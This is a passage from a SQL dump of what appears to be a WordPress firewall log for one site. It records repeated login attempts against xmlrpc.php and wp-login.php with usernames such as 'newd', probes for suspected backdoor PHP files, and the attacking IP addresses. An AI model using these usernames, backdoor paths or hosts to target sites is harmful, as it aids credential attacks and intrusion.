'newd',0,1664315407.1101,152,'rgN9SOPt1IVq6EoKj38hCAFW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('123.56.5.185',2067269049,'newd',0,1664315407.6863,152,'INtT31KE92vnojPkpFerZDJf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('130.193.9.3',2193688835,'newd',0,1664315409.3037,152,'pRYNPvJwV9sfQ6buTtK4yUBM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('23.111.168.178',393193650,'newd',0,1664315411.2079,152,'1pYHjfn6Fg8kR3MVz0mEQ4Uu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('201.236.28.16',3387694096,'newd',0,1664315413.4174,152,'1umHoKBTg605yijk4MUtVDQ8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('149.210.196.253',2513618173,'newd',0,1664315414.6986,152,'9mwrMGJe2kI6jC3hsKPglWnV','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('172.105.49.155',2892575131,'newd',0,1664315415.8597,152,'AcGCIkbdY4FWgU7NjQHt8iE2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('50.62.177.214',842969558,'newd',0,1664315418.4095,152,'zM2ToDC6Uv7ujLGAOXmF81tH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('87.239.23.107',1475286891,'newd',0,1664315422.3886,152,'jWicYM7NKS5skVQnoCx2Upbh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('204.12.235.139',3423398795,'newd',0,1664315424.7767,152,'1kMDNKWArwqHo06ubZ8IyjtQ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('13.64.60.246',222313718,'newd',0,1664315426.4637,152,'mQ7DL2jeBYVbsE6taqrNXMAI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('43.153.25.22',731453718,'newd',0,1664315427.4671,152,'cQp0THYUmn8sy4WiBtVxS5ER','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('65.2.119.66',1090680642,'newd',0,1664315432.5380,152,'pezDlA0yonkuSJIgYhjFZafG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('168.138.1.42',2827616554,'newd',0,1664318535.9388,152,'r6XgP8NKItmVjnSMLJyiTZuw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('207.180.235.153',3484740505,'newd',0,1664318544.5668,152,'NlsmqyEnphZTaUX4o7GI6wif','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.89.228.130',861529218,'newd',0,1664318552.1323,152,'6EcNJvwtGypAeUBo8TMDhalL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.166.103.30',3165021982,'newd',0,1664318553.1498,152,'5sUcxtNQiV1uJmEKalhIZB7v','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.72.232.31',2487805983,'newd',0,1664318556.2447,152,'CHgO8N94WsUTR27Bx1qXQEDt','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('109.235.66.248',1844134648,'newd',0,1664318578.5455,152,'9scKYUoV61BATvXlOLq4QnjJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('168.138.1.42',2827616554,'newd',0,1664318583.5898,152,'y05qeFXJup3HKgIlxURWfavt','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('160.16.210.199',2685457095,'newd',0,1664318585.8410,152,'a31P47EtKrS8xlbpZn9ujO6H','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('143.244.177.220',2415178204,'newd',0,1664318750.5315,7,'qoLslE1Sw6KDjx3h4nX5WfFa','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('157.230.127.126',2649128830,'newd',0,1664318775.8832,7,'j1Q2VdW987pEmJhZxztbKDno','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.75.15.189',860557245,'newd',0,1664319898.2895,7,'OAeJnHEDhiIT291wcQCPRS5M','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('120.78.15.126',2018381694,'newd',0,1664319905.6858,7,'gML9xnmZ8DPIjd7v32orkENA','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('207.180.235.153',3484740505,'newd',0,1664320342.6965,152,'sRG45pSHJfOZk687XDzMmKlv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('204.93.193.216',3428696536,'newd',0,1664320342.7185,152,'JgaoY2svZki19NK5djq3eDTz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('72.167.77.106',1218923882,'newd',0,1664320348.2095,152,'E0q5DSN47nUx2k3XAeBzY8TZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.68.47.69',3158585157,'newd',0,1664320348.6557,152,'4m2kOdUwbBHr91pRFch5aetq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.77.159.184',860725176,'newd',0,1664320367.6537,152,'mE628A3xWBLQUIJRlXeKrcDF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('201.236.28.16',3387694096,'newd',0,1664320376.5584,152,'e6pLZGJxm9g53cdlED7fNYC2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('217.146.69.53',3650241845,'newd',0,1664320378.6667,152,'7hpr6ANFwHtOsSnCflj8Da2Y','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('207.180.235.153',3484740505,'newd',0,1664320384.1247,152,'wgB4nyeENlm9UC3tbRPXHV7O','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.77.159.184',860725176,'newd',0,1664320384.8771,152,'BaQOcL9jHzfSEgToqCIi2ye3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.205.62.27',1137524251,'newd',0,1664321039.9542,7,'PdG9lhoD4qAVF0L6cwE7XYtp','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('151.106.41.64',2540316992,'newd',0,1664321046.5261,7,'DdIt2yGkFijJCUcKYLBhNxPM','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('69.163.186.158',1168358046,'newd',0,1664322173.5022,7,'BruN1TcAQ3kt0PiE57VxembY','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.255.81.60',872370492,'newd',0,1664322181.8016,7,'FilZ8Gw92t6cSKrfQk3x4UhY','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('82.156.45.135',1385966983,'newd',0,1664323215.3682,152,'ZA3n6BXLROmbqDNTe8HKuUQw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('92.205.10.44',1556941356,'newd',0,1664323215.5039,152,'e4sUdr1IYHSzu8apgL7cb5Mi','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('72.167.77.106',1218923882,'newd',0,1664323216.8517,152,'aMpNVlcmrWKSG8RCIPzwk19X','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('89.46.107.98',1496214370,'newd',0,1664323224.5862,152,'dQX4xkC1PgelHWAhbrNR0wan','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.166.103.30',3165021982,'newd',0,1664323232.4195,152,'3IlFedgKaGLrM7hzySoPTHk5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.165.86.198',1386567366,'newd',0,1664323233.6947,152,'LUFOwV8SebhpkrElDGvBn5IN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.183.26.89',1152850521,'newd',0,1664323236.7434,152,'gZF8VesbdBwGPzuLrK7oMUYO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.128.2.114',2994733682,'newd',0,1664323257.1293,152,'1neqOWRw9J5aVYElNhAtzP2g','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.205.62.27',1137524251,'newd',0,1664323290.0011,7,'QVzgEj4kn2MoZw9YP8BdpCD6','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('212.103.4.29',3563521053,'newd',0,1664323315.7110,7,'FArjQdwM5OBXxJZSTyUs8G9u','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('139.59.118.238',2335930094,'newd',0,1664324450.7098,7,'SoaxwNWuhA7ZqzUvDktmM9yB','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('36.92.166.178',610051762,'newd',0,1664324457.4271,152,'jKbD52ySOA3fYoRlmT104vs8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.72.214.245',2487801589,'newd',0,1664324458.2883,7,'4FIarymQHxOEN5gBcfl2vuwL','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('101.200.198.206',1707656910,'newd',0,1664324460.8822,152,'2SwX1UWqCVa9YHyARPemoijn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.163.161.146',1738776978,'newd',0,1664324471.3824,152,'xXT6R1VrPFJlcq38Md2ZWCSE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.94.98.209',3109970641,'newd',0,1664324480.3987,152,'sMgEtjU5RZl8Npf7P1JO0Sxv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.109.68.254',3496822014,'newd',0,1664324480.7008,152,'oPe305OX2bhSlsYuQHRiBEzf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.163.161.146',1738776978,'newd',0,1664324481.0391,152,'3Y5V6rTUnfIvX2asMg4iElu8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('207.180.235.153',3484740505,'newd',0,1664324493.9179,152,'5tGcz2EIvVWmbFSUYZquBHCk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('143.244.177.220',2415178204,'newd',0,1664325591.2645,7,'s7C6q1dtB3DlnE9cMAYvL4Zx','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('192.99.201.91',3227765083,'newd',0,1664325598.8198,7,'glipvBjRVAQDcChJetM4rfxm','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.166.103.30',3165021982,'newd',0,1664326476.4647,152,'fxURGwnAO3oSh9THvL8MuJck','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('61.19.125.142',1024687502,'newd',0,1664326479.3507,152,'H7nD51tV2MNJmuf4weRxA6db','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.166.103.30',3165021982,'newd',0,1664326481.4039,152,'9moqA4nBthQki6eGD3gLc0Yl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.147.151',2160563095,'newd',0,1664326501.4831,152,'Z5Rxj9WtSkqLV3gcrdNQ6ezM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.58.73.254',3107604990,'newd',0,1664326502.1637,152,'4UhWTsDoOq2SdAyiY175Batl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('217.116.205.56',3648310584,'newd',0,1664326514.5838,152,'Zi85f0BXaQ7n3IlEjRP1s4uH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('50.62.177.214',842969558,'newd',0,1664326516.6763,152,'lFpzUdTJG2ogqMVaECwPctnA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('202.29.236.140',3390958732,'newd',0,1664326714.9411,7,'DmkMTVyn5LYtSgzHG1chuNlv','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('178.217.190.82',3000614482,'newd',0,1664326738.4183,7,'XdOpoQnDUZBVGAkJNmalj47u','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('152.89.196.13',2556019725,'',0,1664327791.1654,55,'ypWG935e7zaAKIPTOsnlJkb0','','19|0|0|0|cteisys.com/wp-content/wp-files-conficg.php',0,19,0),('137.184.193.51',2310586675,'newd',0,1664329576.4355,152,'IFMAwyJPm2Z6zhqGfVu4iCdW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.72.232.31',2487805983,'newd',0,1664329584.0020,152,'2agKsFv80t3pVbWQURDqwCmO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.109.68.254',3496822014,'newd',0,1664329587.8466,152,'xFlY6sKHkv2cturz8odqCJ0U','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.143.81.51',764367155,'newd',0,1664329607.4729,152,'MPwdnIp7Vef1cuhliAqrWDx8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.107.113.101',3110826341,'newd',0,1664329617.7185,152,'AGhQXIsg1w8vFebirW9RdcEt','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.200.116.219',3116922075,'joyce',0,1664330092.2493,152,'tH1w6nc3JPgUID8LO2Zf5KBX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.187.58.136',599472776,'newd',0,1664330159.5357,7,'U2sd64RDQwCZJgyWGuIbLzEv','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('23.97.205.210',392285650,'newd',0,1664330184.3195,7,'PiFGm3Dg0kj6YRe71QHTy4Xa','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('72.167.77.106',1218923882,'newd',0,1664330965.3832,152,'5sRE63N2cFT1mQBa8ZxJGblK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('176.9.113.101',2953408869,'newd',0,1664330967.7944,152,'dpbBLUs4mj3fCRhEzYMrwKQX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.241.3.166',804324262,'newd',0,1664330972.4605,152,'iVNAL2Hvrtp0f1nmSlJkRIZx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.166.103.30',3165021982,'newd',0,1664330981.5997,152,'gRcYO8zlAK9Dm6GZhxd7taLB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.109.214.179',3496859315,'newd',0,1664330982.0094,152,'8hOcH6Xluprjyf5Low3VmY2a','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.147.151',2160563095,'newd',0,1664330984.9891,152,'wipoGFQSdvJ95WeTXEh3Ktbx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('101.200.198.206',1707656910,'newd',0,1664330985.9069,152,'ZqyjgQRrOvo9DVchi15eJGMP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('176.9.74.94',2953398878,'',0,1664331160.7770,55,'7XUAIjQZcBl52K1zTpxHDnqe','','19|0|0|0|cteisys.com/wp-includes/wp-class.php',0,19,0),('176.9.74.94',2953398878,'',0,1664331167.2109,55,'apiYDA256USHucZyLdqCoxkE','','19|0|0|0|cteisys.com/wp-includes/wp-class.php',0,19,0),('46.32.228.70',773907526,'newd',0,1664331332.4469,7,'pOh4KtSf95BVFZvXkgsrD0GR','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.130.219.13',1736629005,'newd',0,1664331356.9176,7,'oGRPgbm7JQT6Bryakw8iENZu','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('192.71.144.12',3225915404,'newd',0,1664332506.5679,7,'CgzEw0TarUbQlLOIhZGp2Fu3','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('119.237.81.29',2012041501,'newd',0,1664332517.1054,7,'UI0PcJAvnwlsNdL342DHgxRm','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.58.73.254',3107604990,'newd',0,1664333016.3212,152,'clxBzJhLOas7y4mb0GE9oNv1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.2.6.12',3103917580,'newd',0,1664333016.3879,152,'0lAKuD1QJZXNyBT3LHGsxSka','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('173.212.223.238',2916409326,'newd',0,1664333016.4011,152,'k3Ia0HDvigoBbEf4mzYV8ZLx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('217.146.69.53',3650241845,'newd',0,1664333027.6833,152,'d0nDLuTAHamrp9eX7YbtoWh3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('66.33.205.144',1109511568,'newd',0,1664333028.0435,152,'Q0o9cSbgeyVKOxhq1ivNGp6M','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.54.204',2160539340,'newd',0,1664333036.7796,152,'zkEdnf8wutbCAIgLmvQ2NoPj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('134.209.184.76',2261891148,'newd',0,1664333664.3409,7,'Hhg5Wi2FT7C3B4sMZpNnKrUv','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('152.89.196.13',2556019725,'',0,1664333925.4916,55,'urI5oBGRd2Dg63p1NZSsjhz0','','19|0|0|0|cteisys.com/wp-content/wordpress-index-keyword.php',0,19,0),('69.163.152.108',1168349292,'newd',0,1664334832.5229,7,'GyvDnimcLK6g2Nh0uYXtfUHr','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('23.99.229.218',392422874,'newd',0,1664334844.9368,7,'rd39XBQ5pasKxCRh6mwTEfgv','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('142.93.48.70',2388471878,'newd',0,1664335723.2525,152,'H2OYJaTjlVo9knewu7hZd4C5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('177.55.111.11',2973200139,'newd',0,1664335723.2547,152,'rlNxpzPv9mjtUf4g1wEYbySG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('176.9.113.101',2953408869,'newd',0,1664335723.2984,152,'JI8uQtMOiz4shgayDnrjwboB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.47.94',3515690846,'nathaniel-lipka',0,1664336015.0809,51,'nCGd6hbe2pwgB4lzN708VEoi','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.91.220.143',861658255,'newd',0,1664336015.1854,7,'eZYsrIkpxcm7oKFdU2qJzTbG','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('201.236.28.16',3387694096,'newd',0,1664336294.4387,152,'af3KBoT1cgQn0yHqmC8ROk2p','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('50.62.177.214',842969558,'newd',0,1664336294.4774,152,'Ctrlm5w6eixofYBzPQ8yZRp2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('89.46.107.98',1496214370,'newd',0,1664336298.4934,152,'D87gjLyXn1lFTuxRpZmI3sOk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.77.159.184',860725176,'newd',0,1664336302.7999,152,'PRriHmwCtVjXxTkM4WNQZzDo','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('176.9.113.101',2953408869,'newd',0,1664336304.4482,152,'YEJVAGbspyk7TSOlj0QaBuZP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('124.222.194.56',2094973496,'newd',0,1664336307.9302,152,'qyWSBXxFiMtO4zYRdlNn7eph','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.127.106.229',2155834085,'newd',0,1664336338.9799,152,'06uNJZzln9DcyhskdjprABaT','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('64.71.32.81',1078403153,'newd',0,1664336339.0262,152,'s8FDPCnV4AagrNlixHj5Q3qh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('101.200.198.206',1707656910,'newd',0,1664336404.9606,152,'Rhg6JucpASkiXlPyHq2F4Vot','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.212.56.30',2731816990,'newd',0,1664336405.3104,152,'Fv6InYK1PMumEB98piDz2Alr','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.252.248.52',771553332,'newd',0,1664336420.8865,152,'3rBysn1tgb8keM7vjXL4Eacu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('72.167.77.106',1218923882,'newd',0,1664336420.9049,152,'lSEAbtnuqoxh6R0cPdWjTKMi','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('211.13.204.1',3540896769,'newd',0,1664336420.9062,152,'IKs1b03Q46CoWhqti8zf9cEJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('54.37.156.2',908434434,'newd',0,1664336426.9644,152,'l458FcMHjI3vyrOoVq6AQGa9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('92.204.239.12',1556934412,'newd',0,1664336432.8243,152,'jMmFBDK10pi4foVJLlC5dGyx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('50.62.177.214',842969558,'newd',0,1664336433.2141,152,'E8sf7XuyTImdwx0SL3ViCUzn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('77.68.64.29',1296318493,'newd',0,1664336436.3719,152,'S0gfvPLJmiDNxcOBdp1EntuC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.130.218.178',1736628914,'newd',0,1664337149.6901,7,'NylQvdwWLYKUH843P0tITSO7','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('120.27.240.230',2015097062,'newd',0,1664337175.2650,7,'08BflceNEKqzo9kyFY4vZAnH','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('109.235.66.248',1844134648,'newd',0,1664339950.7894,152,'r1hIsqUyCSbYJfQK2Wi90HZw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('13.64.60.246',222313718,'newd',0,1664339950.8988,152,'HOiWS4ZICrw3z9uBjNbmclLq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('43.153.25.22',731453718,'newd',0,1664339950.9862,152,'pgS9NsetfGbmXqHRAM7KDk0j','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('160.16.210.199',2685457095,'newd',0,1664339955.7516,152,'zkYEGB4byXZ79vSiChtr8Iu3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.212.56.30',2731816990,'newd',0,1664339958.3003,152,'nHAoTk8JFbyclvN2MpsZi7uV','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.107.112.126',3110826110,'newd',0,1664339969.5559,152,'2dCsJyEcIQ79pN0LoRAPHt86','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.109.68.254',3496822014,'newd',0,1664339972.5031,152,'JXKVMGcDn3AUvRLdour851st','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('116.202.117.198',1959425478,'newd',0,1664339972.7627,152,'d8BoPwV3jYh6iXgQI0KeTv1x','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.2.6.12',3103917580,'newd',0,1664339975.7529,152,'f3CAYd9NPqVTakWgwBOzjlUb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.72.232.31',2487805983,'newd',0,1664339982.9310,152,'1bAMVLGirw8fKQ0YhUcWJnxP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('173.212.223.238',2916409326,'newd',0,1664339983.5993,152,'qAmiLXHkfa37gx6MuDFwyvpd','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.89.228.130',861529218,'newd',0,1664339990.3323,152,'y095f8r3wzZhnHQLgVRe2FdP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('107.189.14.89',1807552089,'Joyce',0,1664340790.4266,51,'BWQ9HTeL72GflgtzJY6OPuoN','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('142.93.56.89',2388473945,'newd',0,1664340889.7425,7,'Fe0ugCAniWl83NbcEMRhqXmQ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('143.244.155.35',2415172387,'newd',0,1664340923.0783,7,'Bg5lXKOym1ehA8Lvxbf4tUN2','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('152.89.196.13',2556019725,'',0,1664341208.2645,55,'lpCxQajdOrJwR1eIot9bhBn4','','19|0|0|0|cteisys.com/wp-content/wp-files-conficg.php',0,19,0),('45.76.147.0',759993088,'newd',0,1664342276.8817,152,'7lhJkr4o58gFO2LusfVeixRZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.68.47.69',3158585157,'newd',0,1664342286.1287,152,'nmG26UBt0OLjAMySpVzNChfk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('52.179.81.192',884167104,'newd',0,1664342287.0280,152,'WeF0hcNByXjuo1PD6Kl47mGU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.68.11.199',860097479,'newd',0,1664342295.6701,152,'Y2MJXSsKILyBbr1T7UeOQj34','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('109.235.66.248',1844134648,'newd',0,1664342296.6716,152,'5tWNyPgTpKoFaJEVvhwD43Ac','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.128.102.185',2994759353,'newd',0,1664342302.9901,152,'hlusEzHGDVFp7oMKSjPwfyTe','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.183.26.89',1152850521,'newd',0,1664342309.5693,152,'47KQaz2NYUoegMAGOqPvnlHj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('136.144.179.78',2291184462,'newd',0,1664342314.3131,152,'TF07g5Lf3exBIaJR2sEZkYz8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.143.81.51',764367155,'newd',0,1664342315.6801,152,'Ofd7MQKyzxDc423HX56qCksT','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.2.4.134',3103917190,'newd',0,1664343248.7523,7,'zKBfnZciDA72HULlkbxPa8r9','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('47.110.72.238',795756782,'newd',0,1664343258.2334,7,'heX0OAmiWRqf5dEFnyL9VPou','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.156.175.60',3114053436,'joyce',0,1664343516.6259,152,'5uZRD68oHsWAyplCnqbNTJXv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('69.163.152.108',1168349292,'newd',0,1664344438.7731,7,'FImZzihsYrJp2ePOLkMK0yCE','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('192.71.144.12',3225915404,'newd',0,1664344447.6929,7,'GdHviesgDMT9P5afVmObZqKY','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('34.86.38.165',576071333,'newd',0,1664345800.8932,152,'G9zHexWcLTKdhRE7QMYNgfk8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('92.205.10.44',1556941356,'newd',0,1664345801.0139,152,'rJIzyhEsDom75WPiqRKMln6x','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('160.16.210.199',2685457095,'newd',0,1664345807.5985,152,'gO2I1ecMsLiUJW6bRYwr7HAn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('211.13.204.1',3540896769,'newd',0,1664345812.3874,152,'vo5etVTPOhykJBAbflY8xNIX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('116.202.117.198',1959425478,'newd',0,1664345818.1016,152,'7uYvhQWjwcPkDCN0MrUayB9l','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('37.251.155.62',637246270,'newd',0,1664345819.6148,152,'B8wa3SXDoPiFVHOCNAWU9125','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.183.26.89',1152850521,'newd',0,1664345822.3697,152,'BxS4vdYpQrhCsuUl7IzXtaF6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.100.142',2160551054,'newd',0,1664346779.1747,7,'vdYineWoA6sq1PUMgyDVNpkl','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.223.170.181',2682235573,'newd',0,1664346783.5315,7,'1SZiNDjrpqwInWoa3l8hOEGC','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('129.226.11.117',2179074933,'newd',0,1664347363.9289,152,'F5RSoWjnLYXPk0pVuqbdKHzE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('201.236.28.16',3387694096,'newd',0,1664347364.0850,152,'sybv8kw6AaNK19mDguidTXUn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('92.205.10.44',1556941356,'newd',0,1664347364.2027,152,'Pdm3qVG1gCEbh64UcaQeir2u','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('50.62.177.214',842969558,'newd',0,1664347369.1671,152,'JDBbMpqUl41Z08wAntoOuT5H','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('92.205.10.44',1556941356,'newd',0,1664347373.4944,152,'8ThFtzuCDvrIqgdm3fN7o5wx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('142.93.48.70',2388471878,'newd',0,1664347380.4275,152,'Qeo926UZDxGX3dJwLTbC7RP8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('201.236.28.16',3387694096,'newd',0,1664347382.9603,152,'1ZmPvjzKsNRpAC3iGqJk8Dyd','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('72.167.77.106',1218923882,'newd',0,1664347385.2030,152,'UWVjkbmxFw8E6cgsIno7OMZp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.195.166',2160575398,'newd',0,1664347394.7103,152,'AYNCPF7dM6J1OcqeTEltrXhz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('46.32.228.70',773907526,'newd',0,1664347944.9326,7,'jMRqn8bfSGxVJeZt35KQokDa','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('194.38.20.161',3257275553,'',0,1664348831.0141,55,'delyJbkUr0Eg8YpZz9PhILaj','','19|0|0|0|cteisys.com/wp-content/themes/deep-blue/megaframe/megapanel/inc/functions.php',0,19,0),('64.90.36.102',1079649382,'newd',0,1664349098.7762,7,'i1YSQJ7Gd0zPZDI6H3mW8Kgc','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('148.72.214.194',2487801538,'newd',0,1664349126.3341,7,'TSHK2kanOCLiZYsm8EuWMD6r','','0|0|0|0|cteisys.com/wp